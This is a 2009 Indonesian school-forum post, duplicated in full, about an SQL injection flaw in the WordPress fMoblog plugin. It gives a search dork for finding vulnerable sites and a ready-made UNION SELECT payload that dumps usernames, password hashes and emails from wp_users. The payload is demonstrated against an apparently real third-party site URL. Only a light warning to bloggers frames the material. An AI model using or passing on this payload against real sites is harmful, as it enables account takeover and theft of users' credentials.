Forum Anak-anak SMA 2 Kendari
Kami Rasa Anda Belum Login atau Terdaftar!!
Silahkan klik Login untuk Masuk Forum atau Klik Pendaftaran Untuk Registrasi.
Forum Anak-anak SMA 2 Kendari

Forum Anak-anak SMA 2 Kendari


You are not connected. Please login or register

Khusus Pengguna Plugin fMoblog di Wordpress

Topik sebelumnya Topik selanjutnya Go down  Message [Halaman 1 dari 1]

1 Khusus Pengguna Plugin fMoblog di Wordpress on Thu 19 Mar 2009, 5:52 pm

adhe


Senior
Senior
Lagi ngga ada kerjaan, sembari bersih bersih file, kebetulan awal bulan besok saya udah mau hengkang dari kerjaan saat ini, akhirnya iseng deh baca baca info terbaru di luar sana, dan ada satu topik yang bikin saya betah untuk baca baca sekalian iseng ngelakuin penetration test Very Happy [ maaf isitlah penetration test juga baru dengar dari suhu C4turla, karena memang beliau adalah suhu di bidang ini, ada rasa enggan juga mau bahas topik ginian, karena ilmu saya sangatlah jauh bila dibandingkan dengan para master semua al [ suhu c4turla dan suhu ariefkeke ], namun karena saya liat banyak di antara kita memiliki blog di wordpress jadi tak ada salahnyalah berbagi informasi.

oh iya perlu di catat bahwa vulnerability ini bukan saya yg temukan karena seperti yg sabilang di atas, pengetahuan saya belum seberapa apalagi kalo mau disandingkan dengan kemampuan otak yang rada telmi Very Happy Very Happy

wiihh kenapa jadi curhat di Question

ya sudah langsung saja palena kalu begitu !!

fMoblog merupakan salah satu plugin yang dibuat oleh V.J.Catkick. versi yang teredia saat ini adalah versi 0.1.2 dengan update terakhir tanggal 6 februari 2009, dan bagi yang mau mengintegrasikan kedalam WP nya, maka minimal versi 2.5 yang da support. silahkan buka situsnya kalo mau tau lebih banyak tentang widget ini http://wordpress.org/extend/plugins/moblog/.

Bagi para blogger mania yang kebetulan pake wordpress dan juga memanfaatkan widget ini, maka berhari hatilah karena ternyata widget ini punya kelemahan sehingga bisa di lakukan sql injection [ tentang sql injection jangan tanya saya ya Very Happy ]

Penasaran bagaimana caranya ? inimi dia caranya kasian

keyword : "Gallery powered by fMoblog"
Jurusnya ini : alamat situs/?halaman yang ada celahnya&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

contoh :
http://sim01.com/word/?page_id=16

setelah di kasih doti menjadi

http://sim01.com/word/?page_id=16&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

ini capturenya :




sumber bacaan : http://www.milw0rm.com/


Nb, codenya ada yg ke potong, silahkan baca baca disini untuk lebih lengkapnya :

http://www.milw0rm.com/exploits/8229

Lihat profil user http://www.adhewoelan.blogspot.com
Lagi ngga ada kerjaan, sembari bersih bersih file, kebetulan awal bulan besok saya udah mau hengkang dari kerjaan saat ini, akhirnya iseng deh baca baca info terbaru di luar sana, dan ada satu topik yang bikin saya betah untuk baca baca sekalian iseng ngelakuin penetration test Very Happy [ maaf isitlah penetration test juga baru dengar dari suhu C4turla, karena memang beliau adalah suhu di bidang ini, ada rasa enggan juga mau bahas topik ginian, karena ilmu saya sangatlah jauh bila dibandingkan dengan para master semua al [ suhu c4turla dan suhu ariefkeke ], namun karena saya liat banyak di antara kita memiliki blog di wordpress jadi tak ada salahnyalah berbagi informasi.

oh iya perlu di catat bahwa vulnerability ini bukan saya yg temukan karena seperti yg sabilang di atas, pengetahuan saya belum seberapa apalagi kalo mau disandingkan dengan kemampuan otak yang rada telmi Very Happy Very Happy

wiihh kenapa jadi curhat di Question

ya sudah langsung saja palena kalu begitu !!

fMoblog merupakan salah satu plugin yang dibuat oleh V.J.Catkick. versi yang teredia saat ini adalah versi 0.1.2 dengan update terakhir tanggal 6 februari 2009, dan bagi yang mau mengintegrasikan kedalam WP nya, maka minimal versi 2.5 yang da support. silahkan buka situsnya kalo mau tau lebih banyak tentang widget ini http://wordpress.org/extend/plugins/moblog/.

Bagi para blogger mania yang kebetulan pake wordpress dan juga memanfaatkan widget ini, maka berhari hatilah karena ternyata widget ini punya kelemahan sehingga bisa di lakukan sql injection [ tentang sql injection jangan tanya saya ya Very Happy ]

Penasaran bagaimana caranya ? inimi dia caranya kasian

keyword : "Gallery powered by fMoblog"
Jurusnya ini : alamat situs/?halaman yang ada celahnya&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

contoh :
http://sim01.com/word/?page_id=16

setelah di kasih doti menjadi

http://sim01.com/word/?page_id=16&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

ini capturenya :




sumber bacaan : http://www.milw0rm.com/


Nb, codenya ada yg ke potong, silahkan baca baca disini untuk lebih lengkapnya :

Lihat profil user http://www.cliquerskendari.blospot.com

Topik sebelumnya Topik selanjutnya Kembali Ke Atas  Message [Halaman 1 dari 1]

Permissions in this forum:
Anda tidak dapat menjawab topik